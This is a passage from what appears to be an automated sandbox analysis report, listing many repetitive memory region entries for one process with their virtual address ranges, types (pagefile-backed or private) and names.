"pagefile_0x0000000000530000" filename = "" Region: id = 10456 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10457 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10458 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10459 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10460 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10461 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10462 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10463 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10464 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10465 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10466 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10467 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10468 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10469 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10470 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10471 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10472 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10473 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10474 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10475 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10476 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10477 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10478 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10479 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10480 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10481 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10482 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10483 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10484 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10485 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10486 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10487 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10488 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10489 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10490 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10491 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10492 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10493 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10494 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10495 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10496 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10497 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10498 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10499 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10500 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10501 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10502 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10503 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10504 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10505 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10506 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10507 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10508 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10509 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10510 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10511 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10512 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10513 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10514 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10515 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10516 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10517 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10518 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10519 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10520 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10521 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10522 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10523 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10524 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10525 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10526 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10527 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10528 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10529 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10530 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10531 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10532 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10533 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10534 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10535 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10536 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10537 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10538 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10539 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10540 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10541 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10542 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10543 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10544 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10545 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10546 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10547 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10548 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10549 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10550 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10551 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10552 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10553 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10554 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10555 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10556 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10557 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10558 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10559 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10560 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10561 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10562 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10563 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10564 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10565 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10566 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10567 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10568 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10569 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10570 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10571 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10572 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10573 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10574 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10575 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10576 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10577 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10578 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10579 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10580 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10581 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10582 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10583 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10584 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10585 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10586 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10587 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10588 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10589 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10590 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10591 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10592 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10593 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10594 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10595 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10596 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10597 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10598 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10599 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10600 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10601 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10602 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10603 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10604 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10605 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10606 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10607 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10608 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10609 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10610 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10611 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10612 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10613 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10614 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10615 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10616 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10617 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10618 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10619 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10620 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10621 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10622 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10623 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10624 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10625 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10626 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10627 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10628 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10629 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10630 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10631 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10632 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10633 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10634 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10635 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10636 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10637 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10638 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10639 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10640 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10641 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10642 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10643 start_va 